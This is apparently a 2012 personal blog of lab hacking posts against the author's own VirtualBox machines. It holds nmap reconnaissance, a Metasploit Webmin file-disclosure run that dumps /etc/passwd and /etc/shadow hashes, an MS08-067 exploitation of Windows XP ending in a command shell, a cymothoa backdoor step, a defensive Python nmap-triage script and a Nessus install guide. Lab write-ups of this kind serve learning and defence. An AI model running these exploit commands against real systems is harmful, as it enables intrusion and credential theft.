When done, change the access privileges of cymothoa on the victim:
#chmod +rwx cymothoa

privilege escalation webmin vuln


Hacking on the weekend: how can we get into the system?? To get it we must follow the rules of hacking.
First step, what should I do? Yea,, information gathering is a great first step.
root@cupenk:~# netdiscover

Currently scanning: 192.168.48.0/16 | Screen View: Unique Hosts
91 Captured ARP Req/Rep packets, from 10 hosts. Total size: 5460
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor
-----------------------------------------------------------------------------
192.168.0.40 10:78:d2:36:65:a4 10 600 Unknown vendor
192.168.0.99 60:eb:69:06:22:ec 17 1020 Unknown vendor
192.168.0.137 00:23:8b:f6:c6:b7 11 660 Unknown vendor
192.168.0.21 08:00:27:f9:c1:bb 19 1140 CADMUS COMPUTER SYSTEMS
192.168.0.89 00:1d:72:1a:56:9c 10 600 Wistron Corporation
192.168.0.104 f4:6d:04:81:f9:39 10 600 Unknown vendor
192.168.0.105 00:1d:72:0d:bb:13 11 660 Wistron Corporation
192.168.0.90 70:5a:b6:17:33:40 01 060 Unknown vendor
192.168.0.98 00:26:22:9b:ac:54 01 060 Unknown vendor
192.168.0.138 00:23:5a:ef:0d:a2 01 060 Unknown vendor

A VirtualBox system has been detected on my network; a server is installed on this VirtualBox machine.
Next I scan: what services are running in there?
root@cupenk:~# nmap -Pn -v -A -sS 192.168.0.21

Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-02-04 17:13 WIT
NSE: Loaded 87 scripts for scanning.
NSE: Script Pre-scanning.
Initiating ARP Ping Scan at 17:13
Scanning 192.168.0.21 [1 port]
Completed ARP Ping Scan at 17:13, 0.06s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 17:13
Completed Parallel DNS resolution of 1 host. at 17:13, 13.00s elapsed
Initiating SYN Stealth Scan at 17:13
Scanning 192.168.0.21 [1000 ports]
Discovered open port 445/tcp on 192.168.0.21
Discovered open port 139/tcp on 192.168.0.21
Discovered open port 22/tcp on 192.168.0.21
Discovered open port 80/tcp on 192.168.0.21
Discovered open port 10000/tcp on 192.168.0.21
Completed SYN Stealth Scan at 17:13, 0.13s elapsed (1000 total ports)
Initiating Service scan at 17:13
Scanning 5 services on 192.168.0.21
Completed Service scan at 17:13, 11.02s elapsed (5 services on 1 host)
Initiating OS detection (try #1) against 192.168.0.21
NSE: Script scanning 192.168.0.21.
Initiating NSE at 17:13
Completed NSE at 17:13, 1.02s elapsed
Nmap scan report for 192.168.0.21
Host is up (0.00059s latency).
Not shown: 995 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.6p1 Debian 5build1 (protocol 2.0)
| ssh-hostkey: 1024 e4:46:40:bf:e6:29:ac:c6:00:e2:b2:a3:e1:50:90:3c (DSA)
|_2048 10:cc:35:45:8e:f2:7a:a1:cc:db:a0:e8:bf:c7:73:3d (RSA)
80/tcp open http Apache httpd 2.2.4 ((Ubuntu) PHP/5.2.3-1ubuntu6)
|_http-title: Site doesn't have a title (text/html).
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
139/tcp open netbios-ssn Samba smbd 3.X (workgroup: MSHOME)
445/tcp open netbios-ssn Samba smbd 3.X (workgroup: MSHOME)
10000/tcp open http MiniServ 0.01 (Webmin httpd)
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
|_http-favicon: Unknown favicon MD5: 1F4BAEFFD3C738F5BEDC24B7B6B43285
MAC Address: 08:00:27:F9:C1:BB (Cadmus Computer Systems)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:kernel:2.6.22
OS details: Linux 2.6.22 (embedded, ARM)
Uptime guess: 0.001 days (since Sat Feb 4 17:12:22 2012)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=207 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:kernel

Host script results:
| nbstat:
| NetBIOS name: UBUNTUVM, NetBIOS user: <unknown>, NetBIOS MAC: <unknown>
| Names
| UBUNTUVM<00> Flags: <unique><active>
| UBUNTUVM<03> Flags: <unique><active>
| UBUNTUVM<20> Flags: <unique><active>
| \x01\x02__MSBROWSE__\x02<01> Flags: <group><active>
| MSHOME<1d> Flags: <unique><active>
| MSHOME<1e> Flags: <group><active>
|_ MSHOME<00> Flags: <group><active>
|_smbv2-enabled: Server doesn't support SMBv2 protocol
| smb-security-mode:
| Account that was used for smb scripts: guest
| User-level authentication
| SMB Security: Challenge/response passwords supported
|_ Message signing disabled (dangerous, but default)
| smb-os-discovery:
| OS: Unix (Samba 3.0.26a)
| Computer name: ubuntuvm
| Domain name: nsdlab
| FQDN: ubuntuvm.NSDLAB
| NetBIOS computer name:
|_ System time: 2012-02-05 00:13:51 UTC-6

TRACEROUTE
HOP RTT ADDRESS
1 0.59 ms 192.168.0.21

NSE: Script Post-scanning.
Initiating NSE at 17:13
Completed NSE at 17:13, 0.00s elapsed
Read data files from: /usr/local/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 28.46 seconds
Raw packets sent: 1020 (45.626KB) | Rcvd: 1016 (41.358KB)
Yea,, some ports are open on the system. Any vuln in there? I must run Nessus to scan for vulns.
[image: Nessus scan results]
44 vulns: 1 high, 4 medium, 29 low
The high vuln is on port 22, so I try to attack that port.
The attack on OpenSSH failed.
So I try attacking another port:
10000/tcp open http MiniServ 0.01 (Webmin httpd)
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
|_http-favicon: Unknown favicon MD5: 1F4BAEFFD3C738F5BEDC24B7B6B43285

Exploitation of port 10000 with Metasploit:

msf > nmap -T4 -Pn -v -A 192.168.0.21
[*] exec: nmap -T4 -Pn -v -A 192.168.0.21


Starting Nmap 5.51SVN ( http://nmap.org ) at 2012-02-04 18:08 WIT
NSE: Loaded 61 scripts for scanning.
Initiating ARP Ping Scan at 18:08
Scanning 192.168.0.21 [1 port]
Completed ARP Ping Scan at 18:08, 0.03s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 18:08
Completed Parallel DNS resolution of 1 host. at 18:09, 13.00s elapsed
Initiating SYN Stealth Scan at 18:09
Scanning 192.168.0.21 [1000 ports]
Discovered open port 80/tcp on 192.168.0.21
Discovered open port 139/tcp on 192.168.0.21
Discovered open port 445/tcp on 192.168.0.21
Discovered open port 22/tcp on 192.168.0.21
Discovered open port 10000/tcp on 192.168.0.21
Completed SYN Stealth Scan at 18:09, 0.09s elapsed (1000 total ports)
Initiating Service scan at 18:09
Scanning 5 services on 192.168.0.21
Completed Service scan at 18:09, 11.02s elapsed (5 services on 1 host)
Initiating OS detection (try #1) against 192.168.0.21
Retrying OS detection (try #2) against 192.168.0.21
Retrying OS detection (try #3) against 192.168.0.21
Retrying OS detection (try #4) against 192.168.0.21
Retrying OS detection (try #5) against 192.168.0.21
NSE: Script scanning 192.168.0.21.
Initiating NSE at 18:09
Completed NSE at 18:09, 0.45s elapsed
Nmap scan report for 192.168.0.21
Host is up (0.00037s latency).
Not shown: 995 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.6p1 Debian 5build1 (protocol 2.0)
| ssh-hostkey: 1024 e4:46:40:bf:e6:29:ac:c6:00:e2:b2:a3:e1:50:90:3c (DSA)
|_2048 10:cc:35:45:8e:f2:7a:a1:cc:db:a0:e8:bf:c7:73:3d (RSA)
80/tcp open http Apache httpd 2.2.4 ((Ubuntu) PHP/5.2.3-1ubuntu6)
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
|_http-title: Site doesn't have a title (text/html).
139/tcp open netbios-ssn Samba smbd 3.X (workgroup: MSHOME)
445/tcp open netbios-ssn Samba smbd 3.X (workgroup: MSHOME)
10000/tcp open http MiniServ 0.01 (Webmin httpd)
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
|_http-favicon: Unknown favicon MD5: 1F4BAEFFD3C738F5BEDC24B7B6B43285
MAC Address: 08:00:27:F9:C1:BB (Cadmus Computer Systems)
No exact OS matches for host (If you know what OS is running on it, see http://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=5.51SVN%D=2/4%OT=22%CT=1%CU=36721%PV=Y%DS=1%DC=D%G=Y%M=080027%TM=
OS:4F2D11EF%P=i686-pc-linux-gnu)SEQ(SP=D4%GCD=1%ISR=EF%TI=Z%CI=Z%II=I%TS=7)
OS:OPS(O1=M5B4ST11NW6%O2=M5B4ST11NW6%O3=M5B4NNT11NW6%O4=M5B4ST11NW6%O5=M5B4
OS:ST11NW6%O6=M5B4ST11)WIN(W1=16A0%W2=16A0%W3=16A0%W4=16A0%W5=16A0%W6=16A0)
OS:ECN(R=Y%DF=Y%T=40%W=16D0%O=M5B4NNSNW6%CC=N%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%
OS:F=AS%RD=0%Q=)T2(R=N)T3(R=Y%DF=Y%T=40%W=16A0%S=O%A=S+%F=AS%O=M5B4ST11NW6%
OS:RD=0%Q=)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0
OS:%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7
OS:(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=
OS:0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)

Uptime guess: 0.040 days (since Sat Feb 4 17:12:22 2012)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=212 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux

Host script results:
| nbstat:
| NetBIOS name: UBUNTUVM, NetBIOS user: <unknown>, NetBIOS MAC: <unknown>
| Names
| UBUNTUVM<00> Flags: <unique><active>
| UBUNTUVM<03> Flags: <unique><active>
| UBUNTUVM<20> Flags: <unique><active>
| \x01\x02__MSBROWSE__\x02<01> Flags: <group><active>
| MSHOME<1d> Flags: <unique><active>
| MSHOME<1e> Flags: <group><active>
|_ MSHOME<00> Flags: <group><active>
|_smbv2-enabled: Server doesn't support SMBv2 protocol
| smb-os-discovery:
| OS: Unix (Samba 3.0.26a)
| Name: MSHOME\Unknown
|_ System time: 2012-02-05 01:09:34 UTC-6

TRACEROUTE
HOP RTT ADDRESS
1 0.37 ms 192.168.0.21

NSE: Script Post-scanning.
Initiating NSE at 18:09
Completed NSE at 18:09, 0.00s elapsed
Read data files from: /opt/framework/share/nmap
OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 37.82 seconds
Raw packets sent: 1096 (52.018KB) | Rcvd: 1076 (46.598KB)
msf > search webmin

Matching Modules
================

Name Disclosure Date Rank Description
---- --------------- ---- -----------
auxiliary/admin/webmin/file_disclosure 2006-06-30 normal Webmin file disclosure


msf > use auxiliary/admin/webmin/file_disclosure
msf auxiliary(file_disclosure) > show options

Module options (auxiliary/admin/webmin/file_disclosure):

Name Current Setting Required Description
---- --------------- -------- -----------
DIR /unauthenticated yes Webmin directory path
Proxies no Use a proxy chain
RHOST yes The target address
RPATH /etc/passwd yes The file to download
RPORT 10000 yes The target port
VHOST no HTTP server virtual host

msf auxiliary(file_disclosure) > set RHOST 192.168.0.21
RHOST => 192.168.0.21
msf auxiliary(file_disclosure) > exploit

[*] Attempting to retrieve /etc/passwd...
[*] The server returned: 200 Document follows
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
dhcp:x:100:101::/nonexistent:/bin/false
syslog:x:101:102::/home/syslog:/bin/false
klog:x:102:103::/home/klog:/bin/false
mysql:x:103:107:MySQL Server,,,:/var/lib/mysql:/bin/false
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
vmware:x:1000:1000:vmware,,,:/home/vmware:/bin/bash
obama:x:1001:1001::/home/obama:/bin/bash
osama:x:1002:1002::/home/osama:/bin/bash
yomama:x:1003:1003::/home/yomama:/bin/bash
[*] Auxiliary module execution completed
msf auxiliary(file_disclosure) > show options

Module options (auxiliary/admin/webmin/file_disclosure):

Name Current Setting Required Description
---- --------------- -------- -----------
DIR /unauthenticated yes Webmin directory path
Proxies no Use a proxy chain
RHOST 192.168.0.21 yes The target address
RPATH /etc/passwd yes The file to download
RPORT 10000 yes The target port
VHOST no HTTP server virtual host

msf auxiliary(file_disclosure) > set RPATH /etc/shadow
RPATH => /etc/shadow
msf auxiliary(file_disclosure) > exploit

[*] Attempting to retrieve /etc/shadow...
[*] The server returned: 200 Document follows
root:$1$LKrO9Q3N$EBgJhPZFHiKXtK0QRqeSm/:14041:0:99999:7:::
daemon:*:14040:0:99999:7:::
bin:*:14040:0:99999:7:::
sys:*:14040:0:99999:7:::
sync:*:14040:0:99999:7:::
games:*:14040:0:99999:7:::
man:*:14040:0:99999:7:::
lp:*:14040:0:99999:7:::
mail:*:14040:0:99999:7:::
news:*:14040:0:99999:7:::
uucp:*:14040:0:99999:7:::
proxy:*:14040:0:99999:7:::
www-data:*:14040:0:99999:7:::
backup:*:14040:0:99999:7:::
list:*:14040:0:99999:7:::
irc:*:14040:0:99999:7:::
gnats:*:14040:0:99999:7:::
nobody:*:14040:0:99999:7:::
dhcp:!:14040:0:99999:7:::
syslog:!:14040:0:99999:7:::
klog:!:14040:0:99999:7:::
mysql:!:14040:0:99999:7:::
sshd:!:14040:0:99999:7:::
vmware:$1$7nwi9F/D$AkdCcO2UfsCOM0IC8BYBb/:14042:0:99999:7:::
obama:$1$hvDHcCfx$pj78hUduionhij9q9JrtA0:14041:0:99999:7:::
osama:$1$Kqiv9qBp$eJg2uGCrOHoXGq0h5ehwe.:14041:0:99999:7:::
yomama:$1$tI4FJ.kP$wgDmweY9SAzJZYqW76oDA.:14041:0:99999:7:::
[*] Auxiliary module execution completed

Next I crack the password hashes with John the Ripper.

Thursday, 02 February 2012

exploitation of windows xp sp3 with an SMB vuln

How do you exploit Windows XP SP3 using BackTrack 5 R1? In this article I explore that. My Windows XP SP3 is installed in VirtualBox; after setting everything up, I check that my BackTrack machine can communicate with the Windows VM. First I find the VM on the network and ping it:

Currently scanning: 192.168.83.0/16   |   Screen View: Unique Hosts        
                                                                             
 5 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 300            
 _____________________________________________________________________________
   IP            At MAC Address      Count  Len   MAC Vendor                
 -----------------------------------------------------------------------------
 192.168.10.1    00:0c:42:e3:89:b1    03    180   Routerboard.com            
 192.168.10.246  08:00:27:a5:ad:44    01    060   CADMUS COMPUTER SYSTEMS    
 192.168.10.251  00:23:8b:e6:02:ee    01    060   Unknown vendor            
I use netdiscover to see the hosts connected to my network; the VirtualBox VM's IP is 192.168.10.246.
Then I ping it:

root@cupenk:~# ping 192.168.10.246
PING 192.168.10.246 (192.168.10.246) 56(84) bytes of data.
64 bytes from 192.168.10.246: icmp_seq=1 ttl=128 time=0.455 ms
64 bytes from 192.168.10.246: icmp_seq=2 ttl=128 time=0.469 ms
64 bytes from 192.168.10.246: icmp_seq=3 ttl=128 time=0.423 ms
64 bytes from 192.168.10.246: icmp_seq=4 ttl=128 time=0.483 ms
64 bytes from 192.168.10.246: icmp_seq=5 ttl=128 time=0.307 ms
^C
--- 192.168.10.246 ping statistics ---
5 packets transmitted, 5 received, 0% packet loss, time 3998ms
rtt min/avg/max/mdev = 0.307/0.427/0.483/0.066 ms
My machine can reach the Windows XP VM in VirtualBox.
Next I scan the Windows machine for open ports:
root@cupenk:~# nmap -T4 -A -v 192.168.10.246

Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-02-02 20:32 WIT
NSE: Loaded 87 scripts for scanning.
NSE: Script Pre-scanning.
Initiating ARP Ping Scan at 20:32
Scanning 192.168.10.246 [1 port]
Completed ARP Ping Scan at 20:32, 0.06s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 20:32
Completed Parallel DNS resolution of 1 host. at 20:32, 0.08s elapsed
Initiating SYN Stealth Scan at 20:32
Scanning 192.168.10.246 [1000 ports]
Discovered open port 135/tcp on 192.168.10.246
Discovered open port 139/tcp on 192.168.10.246
Discovered open port 445/tcp on 192.168.10.246
Completed SYN Stealth Scan at 20:32, 1.24s elapsed (1000 total ports)
Initiating Service scan at 20:32
Scanning 3 services on 192.168.10.246
Completed Service scan at 20:32, 6.01s elapsed (3 services on 1 host)
Initiating OS detection (try #1) against 192.168.10.246
NSE: Script scanning 192.168.10.246.
Initiating NSE at 20:33
Completed NSE at 20:33, 0.19s elapsed
Nmap scan report for 192.168.10.246
Host is up (0.00045s latency).
Not shown: 997 closed ports
PORT    STATE SERVICE      VERSION
135/tcp open  msrpc        Microsoft Windows RPC
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds Microsoft Windows XP microsoft-ds
MAC Address: 08:00:27:A5:AD:44 (Cadmus Computer Systems)
Device type: general purpose
Running: Microsoft Windows XP|2003
OS CPE: cpe:/o:microsoft:windows_xp cpe:/o:microsoft:windows_server_2003
OS details: Microsoft Windows XP SP2 or SP3, or Windows Server 2003
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=259 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| nbstat: 
|   NetBIOS name: CUP3NK, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:a5:ad:44 (Cadmus Computer Systems)
|   Names
|     CUP3NK<00>           Flags: <unique><active>
|     CUP3NK<20>           Flags: <unique><active>
|     WORKGROUP<00>        Flags: <group><active>
|     WORKGROUP<1e>        Flags: <group><active>
|     WORKGROUP<1d>        Flags: <unique><active>
|_    \x01\x02__MSBROWSE__\x02<01>  Flags: <group><active>
|_smbv2-enabled: Server doesn't support SMBv2 protocol
| smb-security-mode: 
|   Account that was used for smb scripts: guest
|   User-level authentication
|   SMB Security: Challenge/response passwords supported
|_  Message signing disabled (dangerous, but default)
| smb-os-discovery: 
|   OS: Windows XP (Windows 2000 LAN Manager)
|   Computer name: cup3nk
|   NetBIOS computer name: CUP3NK
|   Workgroup: WORKGROUP
|_  System time: 2012-02-03 11:32:58 UTC-8

TRACEROUTE
HOP RTT     ADDRESS
1   0.45 ms 192.168.10.246

NSE: Script Post-scanning.
Read data files from: /usr/local/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.47 seconds
           Raw packets sent: 1103 (49.230KB) | Rcvd: 1017 (41.234KB)

I try exploiting the Windows SMB service with Metasploit:
root@cupenk:~# msfcli windows/smb/ms08_067_netapi RHOST=192.168.10.246 PAYLOAD=windows/shell/bind_tcp E
[*] Please wait while we load the module tree...

 ______________________________________________________________________________
|                                                                              |
|                          3Kom SuperHack II Logon                             |
|______________________________________________________________________________|
|                                                                              |
|                                                                              |
|                                                                              |
|                 User Name:          [   security    ]                        |
|                                                                              |
|                 Password:           [               ]                        |
|                                                                              |
|                                                                              |
|                                                                              |
|                                   [ OK ]                                     |
|______________________________________________________________________________|
|                                                                              |
|______________________________________________________________________________|



       =[ metasploit v4.2.0-dev [core:4.2 api:1.0]
+ -- --=[ 798 exploits - 435 auxiliary - 132 post
+ -- --=[ 246 payloads - 27 encoders - 8 nops
       =[ svn r14678 updated today (2012.02.02)

RHOST => 192.168.10.246
PAYLOAD => windows/shell/bind_tcp
[*] Started bind handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (240 bytes) to 192.168.10.246
[*] Command shell session 1 opened (192.168.10.248:47783 -> 192.168.10.246:4444) at 2012-02-02 20:54:14 +0700

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>
I got it: I am in a Windows command shell :D

C:\WINDOWS\system32>ipconfig
ipconfig

Windows IP Configuration


Ethernet adapter Local Area Connection:

        Connection-specific DNS Suffix  . :
        IP Address. . . . . . . . . . . . : 192.168.10.246
        Subnet Mask . . . . . . . . . . . : 255.255.255.0
        Default Gateway . . . . . . . . . : 192.168.10.1

C:\WINDOWS\system32>

scanning for vulnerabilities on windows xp sp3 & ubuntu 10.04 with default configuration

This time I scan Windows XP SP3 and Ubuntu 10.04 for vulnerabilities. Neither Ubuntu nor Windows has any configuration added; everything is default. I use nmap and Nessus for the scans.
ubuntu:


Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-02-02 15:02 WIT
NSE: Loaded 87 scripts for scanning.
NSE: Script Pre-scanning.
Initiating ARP Ping Scan at 15:02
Scanning 192.168.4.43 [1 port]
Completed ARP Ping Scan at 15:02, 0.07s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 15:02
Completed Parallel DNS resolution of 1 host. at 15:02, 0.00s elapsed
Initiating SYN Stealth Scan at 15:02
Scanning 192.168.4.43 [1000 ports]
Completed SYN Stealth Scan at 15:02, 0.39s elapsed (1000 total ports)
Initiating Service scan at 15:02
Initiating OS detection (try #1) against 192.168.4.43
Retrying OS detection (try #2) against 192.168.4.43
NSE: Script scanning 192.168.4.43.
Initiating NSE at 15:02
Completed NSE at 15:02, 0.00s elapsed
Nmap scan report for 192.168.4.43
Host is up (0.0044s latency).
All 1000 scanned ports on 192.168.4.43 are closed
MAC Address: 08:00:27:02:B2:23 (Cadmus Computer Systems)
Too many fingerprints match this host to give specific OS details
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   4.38 ms 192.168.4.43

NSE: Script Post-scanning.
Read data files from: /usr/local/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 3.04 seconds
           Raw packets sent: 1013 (45.696KB) | Rcvd: 1013 (41.632KB)

No open ports on Ubuntu 10.04. Now I scan Windows XP SP3:

Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-02-02 15:04 WIT
NSE: Loaded 87 scripts for scanning.
NSE: Script Pre-scanning.
Initiating ARP Ping Scan at 15:04
Scanning 192.168.4.44 [1 port]
Completed ARP Ping Scan at 15:04, 0.04s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 15:04
Completed Parallel DNS resolution of 1 host. at 15:04, 0.00s elapsed
Initiating SYN Stealth Scan at 15:04
Scanning 192.168.4.44 [1000 ports]
Discovered open port 139/tcp on 192.168.4.44
Discovered open port 135/tcp on 192.168.4.44
Discovered open port 445/tcp on 192.168.4.44
Completed SYN Stealth Scan at 15:04, 0.37s elapsed (1000 total ports)
Initiating Service scan at 15:04
Scanning 3 services on 192.168.4.44
Completed Service scan at 15:04, 6.01s elapsed (3 services on 1 host)
Initiating OS detection (try #1) against 192.168.4.44
NSE: Script scanning 192.168.4.44.
Initiating NSE at 15:04
Completed NSE at 15:04, 0.15s elapsed
Nmap scan report for 192.168.4.44
Host is up (0.0015s latency).
Not shown: 997 closed ports
PORT    STATE SERVICE      VERSION
135/tcp open  msrpc        Microsoft Windows RPC
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds Microsoft Windows XP microsoft-ds
MAC Address: 08:00:27:A5:AD:44 (Cadmus Computer Systems)
Device type: general purpose
Running: Microsoft Windows XP|2003
OS CPE: cpe:/o:microsoft:windows_xp cpe:/o:microsoft:windows_server_2003
OS details: Microsoft Windows XP SP2 or SP3, or Windows Server 2003
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=264 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| nbstat:
|   NetBIOS name: CUP3NK, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:a5:ad:44 (Cadmus Computer Systems)
|   Names
|     CUP3NK<00>           Flags: <unique><active>
|     WORKGROUP<00>        Flags: <group><active>
|     CUP3NK<20>           Flags: <unique><active>
|_    WORKGROUP<1e>        Flags: <group><active>
|_smbv2-enabled: Server doesn't support SMBv2 protocol
| smb-security-mode:
|   Account that was used for smb scripts: guest
|   User-level authentication
|   SMB Security: Challenge/response passwords supported
|_  Message signing disabled (dangerous, but default)
| smb-os-discovery:
|   OS: Windows XP (Windows 2000 LAN Manager)
|   Computer name: cup3nk
|   NetBIOS computer name: CUP3NK
|   Workgroup: WORKGROUP
|_  System time: 2012-02-03 06:04:27 UTC-8

TRACEROUTE
HOP RTT     ADDRESS
1   1.46 ms 192.168.4.44

NSE: Script Post-scanning.
Read data files from: /usr/local/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.02 seconds
           Raw packets sent: 1017 (45.446KB) | Rcvd: 1017 (41.234KB)
On Windows XP SP3 the scan shows an open port that many attackers target: port 445, the SMB service on Windows. Now I gather more information with Nessus:

Windows:
On Windows, Nessus reports that port 445 is vulnerable, with a high security risk level.

Ubuntu:
On Ubuntu, Nessus reports some vulnerabilities, but none with a high risk level.
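The scan reports above are worth triaging automatically rather than reading by eye. The Python below is an added example, not code from this post: it parses the PORT/STATE/SERVICE/VERSION table and host-script lines of nmap's normal output, on two constructed samples shaped like the Linux and Windows reports shown above, and flags the items a defender would act on (the Samba version threshold is an assumption).

```python
"""Triage nmap normal output for the findings the scans above turned up.

Added example, not code from the original post. Flags Webmin/MiniServ
reachable, SMB on Windows XP (the MS08-067 surface), SMB message signing
disabled, and an old Samba release. Sample reports are constructed.
"""
import re

PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")

# Constructed sample shaped like the Ubuntu/Samba/Webmin report above.
LINUX_REPORT = """\
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.6p1 Debian 5build1 (protocol 2.0)
80/tcp open http Apache httpd 2.2.4 ((Ubuntu) PHP/5.2.3-1ubuntu6)
139/tcp open netbios-ssn Samba smbd 3.X (workgroup: MSHOME)
445/tcp open netbios-ssn Samba smbd 3.X (workgroup: MSHOME)
10000/tcp open http MiniServ 0.01 (Webmin httpd)
Host script results:
| smb-security-mode:
|_  Message signing disabled (dangerous, but default)
| smb-os-discovery:
|_  OS: Unix (Samba 3.0.26a)
"""

# Constructed sample shaped like the Windows XP SP3 report above.
WINDOWS_REPORT = """\
PORT    STATE SERVICE      VERSION
135/tcp open  msrpc        Microsoft Windows RPC
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds Microsoft Windows XP microsoft-ds
Host script results:
| smb-security-mode:
|_  Message signing disabled (dangerous, but default)
"""


def parse_ports(report):
    """Return (port, proto, state, service, version) tuples from the port table."""
    rows = []
    for line in report.splitlines():
        m = PORT_RE.match(line.strip())
        if m:
            port, proto, state, service, version = m.groups()
            rows.append((int(port), proto, state, service, version.strip()))
    return rows


def triage(report):
    """Return [(severity, finding)] for one host, port findings first."""
    findings, smb_open = [], False
    for port, proto, state, service, version in parse_ports(report):
        if state != "open":
            continue
        if "Webmin" in version or "MiniServ" in version:
            findings.append(("high", f"{port}/{proto}: Webmin ({version}) reachable; "
                             "restrict the port and update (see the file disclosure above)"))
        if port in (139, 445) and service in ("netbios-ssn", "microsoft-ds"):
            smb_open = True
            if "Windows XP" in version:
                findings.append(("high", f"{port}/{proto}: SMB on Windows XP; confirm "
                                 "MS08-067 is patched and filter 445 from untrusted networks"))
    if smb_open and "Message signing disabled" in report:
        findings.append(("medium", "SMB message signing disabled; require signing"))
    m = re.search(r"Samba (\d+)\.(\d+)\.(\w+)", report)
    # Treating anything below Samba 3.6 as outdated is an assumed threshold.
    if smb_open and m and (int(m.group(1)), int(m.group(2))) < (3, 6):
        findings.append(("high", f"{m.group(0)} is an outdated release; upgrade"))
    return findings
```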


Wednesday, 01 February 2012

Installing Nessus

In this article I explore installing Nessus. Nessus is a tool for vulnerability scanning; you can get it from http://nessus.org/download/. For the installation I use BackTrack 5 R1 (GNOME), so I take the .deb file.
You can install the .deb file with the command " dpkg -i "filename" ". After the install finishes you must add a user to log in to Nessus: in a terminal run [“/opt/nessus/sbin/nessus-adduser”] and fill in a username and password.

Once the user is created you must register to get the plugins. Registration is done at http://www.nessus.org/products/nessus/nessus-homefeed; when that is done, check your email for the registration code. Once you have it, run [/opt/nessus/bin/nessus-fetch --register “kode”] in a terminal and wait until the plugins finish loading. Then start the service with [/etc/init.d/nessusd start] and open https://127.0.0.1:8834/ in a browser.
